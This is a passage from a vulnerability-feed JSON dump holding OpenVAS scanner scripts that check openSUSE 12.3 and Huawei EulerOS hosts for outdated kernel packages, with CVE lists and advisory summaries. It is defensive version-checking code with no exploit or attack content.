res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.7.10~1.28.2\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:10:20", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2014-02-11T00:00:00", "type": "openvas", "title": "SuSE Update for kernel openSUSE-SU-2014:0204-1 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7027", "CVE-2014-0038", "CVE-2013-4513", "CVE-2013-6378", "CVE-2013-4515", "CVE-2013-6431", "CVE-2013-4511", "CVE-2013-1792", "CVE-2013-6368", "CVE-2013-6367", "CVE-2013-4514", "CVE-2013-6376", "CVE-2013-6380", "CVE-2013-0343", "CVE-2013-4587", "CVE-2013-4348"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850566", "href": "http://plugins.openvas.org/nasl.php?oid=850566", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0204_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for kernel openSUSE-SU-2014:0204-1 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850566);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:39:05 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2013-0343\", \"CVE-2013-1792\", \"CVE-2013-4348\", \"CVE-2013-4511\",\n \"CVE-2013-4513\", \"CVE-2013-4514\", \"CVE-2013-4515\", \"CVE-2013-4587\",\n \"CVE-2013-6367\", \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6378\",\n \"CVE-2013-6380\", \"CVE-2013-6431\", \"CVE-2013-7027\", \"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for kernel openSUSE-SU-2014:0204-1 (kernel)\");\n\n tag_insight = \"\n The Linux kernel was updated to fix various bugs and\n security issues:\n\n - mm/page-writeback.c: do not count anon pages as dirtyable\n memory (reclaim stalls).\n - mm/page-writeback.c: fix dirty_balance_reserve\n subtraction from dirtyable memory (reclaim stalls).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - net: fib: fib6_add: fix potential NULL pointer\n dereference (bnc#854173 CVE-2013-6431).\n\n - keys: fix race with concurrent install_user_keyrings()\n (bnc#808358)(CVE-2013-1792).\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - wireless: radiotap: fix parsing buffer overrun\n (bnc#854634 CVE-2013-7027).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - staging: ozwpan: prevent overflow in oz_cdev_write()\n (bnc#849023 CVE-2013-4513).\n\n - perf/x86: Fix offcore_rsp valid mask for SNB/IVB\n (bnc#825006).\n - perf/x86: Add Intel IvyBridge event scheduling\n constraints (bnc#825006).\n\n - libertas: potential oops in debugfs (bnc#852559\n CVE-2013-6378).\n\n - aacraid: prevent invalid pointer dereference (bnc#852373\n CVE-2013-6380).\n\n - staging: wlags49_h2: buffer overflow setting station name\n (bnc#849029 CVE-2013-4514).\n\n - net: flow_dissector: fail on evil iph- ihl (bnc#848079\n CVE-2013-4348).\n\n - Staging: bcm: info leak in ioctl (bnc#849034\n CVE-2013-4515).\n\n - Refresh\n patches.fixes/net-rework-recvmsg-handler-msg_name-and-msg_na\n melen-logic.patch.\n\n - ipv6: remove max_addresses check from\n ipv6_create_tempaddr (bnc#805226, CVE-2013-0343).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - crypto: ansi_cprng - Fix off by one error in non-block\n size request (bnc#840226).\n\n - x6: Fix reserve_initrd so that acpi_initrd_override is\n reached (bnc#831836).\n - Refresh other Xen patches.\n\n - aacraid: missing capable() check in compat ioctl\n (bnc#852558).\n\n -\n patches.fixes/gpio-ich-fix-ichx_gpio_check_available-return.\n patch: Update upstream reference\n\n - perf/ftrace: Fix paranoid level for enabling function\n tracer (bnc#849362).\n\n - xhci: fix null pointer dereference on\n ring_doorbell_for_active_rings (bnc#848255).\n - xhci: Fix oops happening after address device timeout\n (bnc#848255).\n - xhci: Ensure a command structure points to the correct\n trb ...\n\n Description truncated, for more information please check the Reference URL\";\n\n tag_affected = \"kernel on openSUSE 12.3\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0204_1\");\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.7.10~1.28.2\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.7.10~1.28.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-27T18:41:24", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1477)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0155", "CVE-2014-0131", "CVE-2014-0038", "CVE-2013-7270", "CVE-2013-7265", "CVE-2014-0100", "CVE-2013-7267", "CVE-2013-7266", "CVE-2013-7339", "CVE-2014-0102", "CVE-2013-7421", "CVE-2014-0049", "CVE-2014-0181", "CVE-2013-7269", "CVE-2013-7271", "CVE-2013-7268", "CVE-2013-7446", "CVE-2013-7281", "CVE-2014-0077", "CVE-2014-0101", "CVE-2014-0069"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191477", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191477", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1477\");\n script_version(\"2020-01-23T11:50:50+0000\");\n script_cve_id(\"CVE-2013-7265\", \"CVE-2013-7266\", \"CVE-2013-7267\", \"CVE-2013-7268\", \"CVE-2013-7269\", \"CVE-2013-7270\", \"CVE-2013-7271\", \"CVE-2013-7281\", \"CVE-2013-7339\", \"CVE-2013-7421\", \"CVE-2013-7446\", \"CVE-2014-0038\", \"CVE-2014-0049\", \"CVE-2014-0069\", \"CVE-2014-0077\", \"CVE-2014-0100\", \"CVE-2014-0101\", \"CVE-2014-0102\", \"CVE-2014-0131\", \"CVE-2014-0155\", \"CVE-2014-0181\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:50:50 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:50:50 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1477)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1477\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1477\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1477 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7265)\n\nThe mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does not ensure that a certain length value is consistent with the size of an associated data structure, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7266)\n\nThe atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7267)\n\nThe ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7268)\n\nThe nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7269)\n\nThe packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7270)\n\nThe x25_recvmsg function in net/x25/af_x25.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7271)\n\nThe dgram_recvmsg function in net/ieee802154/dgram.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users t ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", 